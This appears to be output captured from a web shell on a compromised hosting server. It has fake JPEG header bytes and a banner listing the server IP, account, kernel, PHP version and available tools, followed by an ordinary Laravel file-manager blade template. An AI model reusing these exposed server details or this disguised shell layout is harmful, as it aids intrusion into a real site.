����JFIF��x�x����'
Server IP : 66.29.137.217 / Your IP : 3.12.163.164 Web Server : LiteSpeed System : Linux premium294.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64 User : gltevjme ( 1095) PHP Version : 7.0.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/gltevjme/cbt.gltechlimited.com/resources/views/vendor/file-manager/ |
Upload File : |
<!DOCTYPE html> <html lang="{{ app()->getLocale() }}"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <!-- CSRF Token --> <meta name="csrf-token" content="{{ csrf_token() }}"> <title>{{ config('app.name', 'File Manager') }}</title> <!-- Styles --> <link rel="stylesheet" href="{{ asset('vendor/font-awesome/all.css') }}"> <link rel="stylesheet" href="{{ asset('vendor/bootstrap/bootstrap.min.css') }}"> <link rel="stylesheet" href="{{ asset('vendor/file-manager/css/file-manager.css') }}"> </head> <body> <div class="container-fluid"> <div class="row"> <div class="position-relative col-md-12" id="fm-main-block"> <div id="fm"></div> <p class="fixed-bottom text-center">{{ __('Double click to choose a file') }}.</p> </div> </div> </div> <!-- File manager --> <script src="{{ asset('vendor/file-manager/js/file-manager.js') }}"></script> <script> document.addEventListener('DOMContentLoaded', function() { // set fm height document.getElementById('fm-main-block').setAttribute('style', 'height:' + window.innerHeight + 'px'); var componentId = '{{ app('request')->input('componentId') }}'; var propertyId = '{{ app('request')->input('propertyId') }}'; // Add callback to file manager fm.$store.commit('fm/setFileCallBack', function(fileUrl) { window.opener.App[componentId].fmSetLink(propertyId, fileUrl); window.close(); }); }); </script> </body> </html>